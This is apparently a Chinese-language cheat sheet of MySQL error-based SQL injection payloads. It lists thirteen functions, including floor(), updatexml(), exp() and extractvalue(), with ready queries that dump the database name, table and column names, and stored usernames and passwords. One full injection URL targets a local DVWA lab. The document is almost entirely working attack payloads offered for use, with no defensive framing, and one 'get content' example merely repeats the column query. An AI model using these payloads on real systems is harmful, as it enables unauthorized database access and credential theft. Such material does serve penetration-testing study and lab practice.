常见报错函数
1. floor()
获取数据库
mysql> select count(*),(concat( 0x3a,database(), 0x3a,floor(rand()*2))) name from information_schema.tables group by name;
获取表名
mysql> select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
获取字段名
mysql> select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
获取内容
mysql> select count(*),concat(0x3a,0x3a,(select username from users limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
2. UpdateXml()
获取表名
mysql> select updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 3,1)),0);
获取字段
mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);
获取内容
mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);
3. exp()
and exp(~(select * from (select user() ) a) );
得到表名
select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));
得到列名
select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));
检索数据
select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));
一蹴而就
exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))
http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#
4. extractvalue() (有长度限制,最长32位)
获取表名
mysql> select extractvalue(1, concat(0x5c,(select table_name from information_schema.tables where table_schema=database() limit 3,1)));
获取字段
mysql> select extractvalue(1, concat(0x5c,(select password from users limit 1,1)));
5. NAME_CONST()
`and+1=(select+*+from+(select+NAME_CONST(PAYLOAD,1),NAME_CONST(PAYLOAD,1))+as+x)`
6. bigint()
select !(select * from (select user())x) -(ps:这是减号) ~0
//bigint超出范围;~0是对0逐位取反,很大的版本在5.5.5及其以上
可以参考文章bigint溢出文章http://www.cnblogs.com/lcamry/articles/5509112.html
7. join()
`select * from(select * from mysql.user a join mysql.user b using(Host))c;(爆列名贼好用)`
8. geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
9. multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
10. polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
11. multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
12. linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
13. multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));